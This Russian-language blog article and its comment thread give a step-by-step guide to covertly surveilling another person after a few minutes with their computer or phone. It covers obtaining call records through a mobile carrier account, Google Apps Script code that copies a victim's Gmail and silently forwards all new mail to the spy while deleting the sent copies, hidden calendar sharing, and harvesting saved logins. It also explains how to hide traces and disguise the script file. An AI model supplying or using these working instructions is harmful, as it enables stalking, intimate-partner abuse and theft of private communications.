Применяя советы из статьи помните об Уголовном Кодексе, золотом правиле нравственности и о том, как неприятно будет человеку, если он узнает, что вы делали что-то подобное.
Этот материал — продолжение статьи Что интересного можно собрать, получив доступ к чужому Mac на минуту. В ней написано о том, какую информацию о человеке можно узнать из его компьютера, пока тот ненадолго отошел. Сегодня расскажу о фишках по быстрому сбору информации из браузера.
Многие сайты не просят авторизации с паролем при каждом заходе на них и это открывает огромные возможности для доморощенных детективов. Все фишки из статьи просты, выполняются за несколько минут и не требуют теоретической подготовки.
Но если вдруг соберетесь применять их для реальной слежки, рекомендую немного потренироваться на своем компьютере, чтобы чувствовать себя уверенно.
Естественно, все эти знания могут вам пригодиться для личных мирных целей: сбор информации из собственного почтового ящика, наведение порядка в контактах и т.д.
1. Получаем детализацию звонков
Чтобы получить детальную информацию о звонках абонентах не нужно иметь связей в органах или тайно снимать скан паспорта, готовясь атаковать менеджера салона сотовой связи приемами социнженерии. Достаточно получить аппарат с нужной симкой на пять минут в личное пользование.
У МТС (и Билайн вроде тоже), если раздать WiFi с телефона, то с компьютера вход в личный кабинет осуществляется без пароля. В личном кабинете можно заказать PDF (или XLS) файл с детализацией звонков за полгода (или более короткий срок) и послать на любой адрес электронной почты. И этот процесс занимает меньше минуты! Естественно, тоже самое можно провернуть, если зайти в личный кабинет непосредственно со смартфона.
Другие операторы я не проверяла, но скорее всего у них аналогичная ситуация. Так что не стоит просматривать историю звонков на телефоне, лучше сразу послать детализацию себе на почту. Очень удобно, что в файле видно из каких регионов идут звонки. Можно отследить местоположение абонента в разные периоды:
Свести номера из детализации с реальными людьми поможет восьмой раздел из статьи Что интересного можно собрать, получив доступ к чужому компьютеру Mac на минуту, либо информация в пункте 4 текущего текста.
2. Смотрим историю поиска
Открываем history.google.com, нажимаем на иконку «три вертикальные точки» и в открывшемся меню выбираем пункт Download searches, соглашаемся с условиями и закрываем уведомление о том, что архив с историей поиска придет к нам на почтовый ящик. Открываем Gmail и дожидаемся письма с искомым файлом (придет через пару минут). Не забываем удалить это письмо.
Поисковые запросы в архиве распределены по месяцам в файлы формата json. Его можно конвертировать в файл Microsoft Excel на сайте json-xls.com.
3. Сохраняем себе чужие письма
Это трюк проходит только с почтовым ящиками на Gmail. Идем на docs.google.com и создаем новый файл. Открываем Инструметы->Редактор скриптов и копируем в него следующий код:
[jscript]
function collectEmails() {
var doc = DocumentApp.create(‘Переписка’); // Новый файл появится в корневой папке Google диска
var searchText = "[email protected]"; // Адрес, переписку с которым надо сохранить
var finalText = ""; // Переменная в которую будем собирать тексты писем
var body = doc.getBody();
var threads = GmailApp.search(searchText); //Ищем все письма, содержащие искомый адрес
for (var x=0; x<=threads.length-1; x++) { // Просматриваем каждую найденую цепочку писем
var messages = threads[x].getMessages(); // Разбираем цепочку по письмам
for (i=0;i<=messages.length-1;i++) { // Просматриваем каждое письмо
finalText=finalText + messages[i].getSubject() + messages[i].getPlainBody() + "";// Считываем из него текст и тему
}
body.appendParagraph(finalText); // Записываем тексты и темы всех писем в файл
}
}
[/jscript]
Нажимаем кнопку запуска и соглашаемся на предложение о сохранение проекта. Еще раз нажимаем на кнопку запуска и даем скрипту разрешение на доступ к почте. Никаких паролей никто не спрашивает. Готовый файл можно скачать себе на флешку для последующего ознакомления (Файл -> Скачать как). Не забываем об удалении всех созданных файлов.
Метод search() можно использовать не только для поиска переписки с конкретным человеком. Вот другие примеры поисковых запросов, которые можно указать в скобках:
- from:Иван Иванов — письма от адресата с определенным именем;
- subject:Расчет — письма с определенной темой;
- has:attachment — письма, у которых есть прикрепленные файлы;
- is:unread — непрочитанные письма;
- is:spamed — письма из папки «Спам»;
- after: 2016/04/01 — письма, отправленные после 1 апреля 2016 года;
- before: 2016/04/01 — письма, отправленные до 1 апреля 2016 года;
- circle:Семья — поиск писем от участников круга «Семья»;
- size:2 000 000 — письма больше 2 мегабайт.
Если вы хотите использовать несколько параметров, то указывайте их через пробел.
Можно было просто скачать почтовый ящик в формате mbox, но для этого необходимы ввод пароля и длительное ожидание.
4. Экспортируем контакты из Gmail
Идем на contacts.google.com, в правом меню выбираем пункт Экспорт, читаем сообщение о том, что экспорт поддерживается только старой версией контактов и переходим на нее по ссылке в окне. Попав в старую версию, нажимаем на шестеренку и в выпадающем меню выбираем пункт Экспорт, выбираем параметры экспорта в появившемся окне и нажимаем на кнопку экспорт. В папке загрузок ищем CSV-файл, который можно открыть в Excel, Numbers или Google Docs.
5. Следим за жизнью жертвы
Идем на calendar.google.com, нажимаем на шестеренку, выбираем пункт меню Настройки -> Календари, находим интересующий нас календарь и переходим о ссылке Открыть общий доступ к календарю слева от него. На открывшейся странице указываем электронный адрес аккаунта Google, с которого собираетесь наблюдать за календарем.
Пользователь обнаружит слежку за своим расписанием, только если захочет расшарить его кому-то еще и зайдет в настройки.
6. Читаем чужую почту каждый день
Часто ли вы смотрите папку «Удаленные»? Большинство людей, которые не слишком активно пользуются почтой, заглядывают в нее раз в квартал и можно спокойно пересылать их письма себе.
Если в Gmail настроить автоматическую пересылку почты традиционным способом на некий адрес, то неделю при заходе в почту будет отображаться всплывающее уведомление об этом сверху экрана. Это делается в целях защиты пользователя от любителей следить за чужой перепиской.
Но если сделать это с помощью Google Apps Script, то никто ничего не заметит (если, конечно, жертва регулярно не просматривает список триггеров GAS).
Идем на docs.google.com и создаем новый файл. Открываем Инструметы->Редактор скриптов и копируем в него следующий код:
[jscript]
function forwardEmails() {
var searchText = "newer_than:1d";
var threads = GmailApp.search(searchText); // Ищем письма, отправленные в последние сутки
for (var x=0; x<=threads.length-1; x++) { // Просматриваем каждую найденую цепочку писем
var messages = threads[x].getMessages(); // Разбираем цепочку по письмам
for (i=0;i<=messages.length-1;i++) { // Просматриваем каждое письмо
messages[i].forward("[email protected]");// Пересылаем письмо на нужный адрес
}
}
}
[/jscript]
Этот код пересылает на определенный адрес все письма, которые отправлены в последние сутки (естественно, при вставке кода надо не забыть этот адрес указать). При желании можно добавить другие фильтры поиска писем (они описаны в третьем разделе этой статьи). Теперь надо вставить код, который будет удалять пересланные письма из папки «Отправленные»:
[jscript]
function deletedEmails() {
var searchText = "to:[email protected]";
var threads = GmailApp.search(searchText); // Ищем письма, отправленные на адрес для слежки
for (var x=0; x<=threads.length-1; x++) { // Просматриваем каждую найденую цепочку писем
var messages = threads[x].getMessages(); // Разбираем цепочку по письмам
for (i=0;i<=messages.length-1;i++) { // Просматриваем каждое письмо
messages[i]..moveToTrash(); // Перемещаем письмо в папку удаленные
}
}
}
[/jscript]
А теперь нам нужно сделать так, чтобы эти две функции запускались каждую ночь. В редакторе скриптов идем в Ресурсы -> Триггеры текущего проекта
Сохраняем изменения. Все! Теперь каждое утро вы можете читать письма жертвы!
К сожалению, если человек активно пользуется Google Docs, то он может обнаружить пустой файл со скриптами. Но если вставить в нее инфу о горячих клавишах для сервисов Google и назвать Autogenerated Help Document, то есть шанс, что в суете дел человек не увидит в нем опасности. Можно еще подписать где-нибудь предупреждение, чтобы человек не удалял этот файл, если хочет получать новую полезную информацию.
Если вышеприведенный абзац кажется вам смешным, вспомните строчку: «И обмануть меня нетрудно, я сам обманываться рад». Человек скорее поверит, что Google сам создает ему файлы помощи, чем предположит, что кто-то лазил в его Google Drive в его отсутствие, так как подсознание охраняет человека от столь травмирующих фактов.
7. Сохраняем переписку VK и прочие страницы с личной информацией
Для переписки VK совет будет предельно простой: прокручиваем страницу с диалогами максимально вниз и выбираем пункт меню Файл -> Сохранить/либо Экспортировать как PDF. После копируем сохраненный файл к себе на флешку и по завершению операции в спокойной обстановке изучаем собеседников человека и их страницы. Аналогично можно поступить со всеми сайтами, на которых есть возможность обмениваться личными сообщениями.
Если очень надо и у вас есть хотя бы полчаса доступа, то можно намутить сохранитель сообщений на iMacros, который сохранит переписку полностью. Но готовый код в статье дать сложно, так как там необходимо использовать указатели элементов по координатам X,Y, которые у каждого пользователя будут свои. А для описания общего подхода к написанию таких макросов нужна отдельная статья. Что-то можно почерпнуть из Хочешь я посижу в интернете за тебя?. Плюс этот способ уже выходит за рамки 5-минутного вторжения.
8. Узнаем на каких сайтах и под какими логинами зарегистрирован человек
В большинстве браузеров хранится список сохраненных логинов и паролей для сайтов, на которых зарегистрирован пользователь. В Safari их можно посмотреть в Safari->Настройки->Пароли. Список сайтов с логинами можно скопировать, последовательно нажав Command + A и Command + С.
9. IP-адрес
Если есть подозрения, что человек троллит вас в комментах, делает фейковые заказы в вашем интернет магазине, нагло ворует контент с вашего проекта (таких людей можно выследить с помощью «Вебвизора» от Яндекс.Метрики), то нужно сравнить его IP-адрес с IP хулигана, определенный счетчиком. Сделать это можно на 2ip.ru.
Не забываем заметать следы
После завершения всех операций необходимо аккуратно почистить историю, список загрузок и папку загрузок.
А также необходимо сделать так, чтобы история изменений файлов на Google Drive выглядела естественно, то есть, чтобы сверху уведомления о создании новой таблицы появился список действий (размером с правую панель), которые бы не вызывали подозрений у жертвы.
Пример как это сделать: тайком позвонить другу и попросить расшарить жертве какие-нибудь файлы на Google Диске (со словами: сделай сейчас, пожалуйста, чтобы не забыть). И надо подгадать так, чтобы файлов/папок с файлами было несколько.
Естественно, это далеко не полный список того, что можно вытащить из браузера человека. Если как следует подумать (особенно над тем, как отвлечь жертву хотя бы на полчасика), то можно обнаружить десятки не менее эффективных фишек.
Если вам интересна тема любительской разведки и сбора данных, то возможно вам понравятся статьи:
- Научись следить за Mac с помощью Automator
- Что интересного можно собрать, получив доступ к чужому Mac на минуту
- 12 способов разыскать владельца сайта и узнать все про него
- 9 сервисов для поиска информации в соцсетях
- 10 веб-сервисов для анализа фотографий
- 20 фишек, как узнать все про любой сайт
- 15 фишек для сбора информации о человеке в интернете
- Как снять девушку в сети
30 комментариев
Форум →Отличная статья :)
@Майор, :-)
@Ирина Чернова, статейка ваша тянет на ст. 33 УК РФ / Подстрекательство к совершению преступления /.
И еще ст. 159 УК РФ (пособничество в совершении мошенничества).
@vadimi76, большое спасибо за напоминание) Комсомольская правда публиковала статьи о том, как поддельные документы покупать и до сих пор выходит газета. А семейный и офисный мелкий шпионаж настолько обыденная вещь, что ей точно никто заниматься не будет.
@Ирина Чернова, это не оправдание. Если любой идиот воспользуется вашими советами и пойдет на преступление, а потом сольет вас как источник своего вдохновения, не удивляйтесь концовке.
@vadimi76, я в 2014-2015 годах работала в журнале, в котором материалы про взлом, слежку, разведку печатались пачками. И это были статьи отнюдь не про сохранение почты скриптами… Издается он с 1999 года. В издательстве работал штатный юрист, с подачи которого на некоторые материалы ставили предупреждения о снятии ответственности с редакции и все спали спокойно. А товарищей, которые пользовались советами из статей хватало всегда)
Впрочем, все когда-то случается в первый раз(((
@Ирина Чернова, КП — пропутинская пропагандистская газетёнка, кто её прикроет?
@lonz, да, Вы правы, с КП не совсем удачный пример.
@vadimi76, почитала статью 33 УК. РФ. Это не подстрекательство однозначно. Пособничество информацией может быть. Но в начале стоит предупреждение о том, что эти деяния могут быть уголовно наказуемы. Десятки лет в прессе публикуются статьи и с гораздо более серьзными трюками, но никто еще журналы за пособничество не судил)
@vadimi76, и большое спасибо вам за внимание и заботу)
@vadimi76, скройся уже, ведешь себя хуже бабы. Одно название что штаны носишь.
Как минимум вам может светить профилактическая беседа с сотрудниками управления “К” МВД России.
@vadimi76, исходя из моих представлений о деятельности отдела “К” им есть кем и чем заняться, кроме авторов статеек о том, как Google-скриптами почту сохранять, пока человек отошел на пять минут)
Но я не исключаю, что Вы осведомлены лучше)
@Ирина Чернова, ну не общайтесь вы с такими вадимами, ясно же что до сих пор с мамой он живет и тд. Материал отличный, спс)
@Makarov, :-)
@vadimi76, и очень сложно доказать пострадавшему, что это вторжение в компьютер было без его согласия.
Если бы я писала статьи: 10 способов узнать пароль к чужой почте, то можно было бы говорить о каком-то преступлении возможном…
А представьте: муж взял телефон жены и заказал с него детализацию. Как она докажет, что не просила его это делать и не сама дала телефон ему в руки?
@vadimi76, господи, какой же ты нудный
@Vizakenjack, прочитал мои мысли) @vadimi76, ещё какой нудный
@vadimi76, че ты ведешь себя терпилой, да еще когда с женщиной общаешься? Носки наверняка сам себе штопаешь, клоун?)))
Ирина, статья интересная! Можно было назвать в духе обновлённого айфонс.ру: “Почему тебе не надо пользоваться гуглосервисами”. Ещё раз убедился, что пользоваться ими не следует!
@G-3, а какие у Вас есть еще на это причины, кроме тотального сбора Google всевозможных данных о Вас?)
@Ирина Чернова, после эпл их вид вызывает эстетическую боль, как будто разные алкаши их проектировали, нет интеграции, есть набор, их количество зашкаливает, а полезность с ростом количества снижается. Ну и плюс Гугл сам их время от времени закрывает и заканчивает поддержку. Для экспериментирующих студентов одним словом.
][… Что ут скажешь :)
Полезно
@D@ZENT, ][леб?
@Майор, :-D если бы я не знала что значат эти две скобочки, то подумала бы что “][…” это какое-то ругательство типа “П…ц”. Чисто визуальная ассоциация…
Не хотел бы я встречаться с Ириной :D
Круто :)
Ирин, а как на такие статьи реагирует ваш муж? :)
поможем вам друзья с этим
пишите в телеграм -905-
541 03 37
Нашли орфографическую ошибку в новости?
Выделите ее мышью и нажмите Ctrl+Enter.Как отключить визуальные эффекты в macOS, чтобы ускорить работу Mac
Как откатиться с macOS Sequoia до macOS Sonoma
Как в iOS 16 изменить виджет аккумулятора. Выбираем нужный гаджет для отображения
Как исправить ошибку 0xE8000001 при подключении iPhone?
Как на Mac быстро запускать действия универсального доступа. Например, менять контрастность
Почему в iPhone без причины падает скорость Wi-Fi
Как запретить установку и удаление приложений на iPhone или iPad
Как быстро переключаться между источниками звука в iOS 11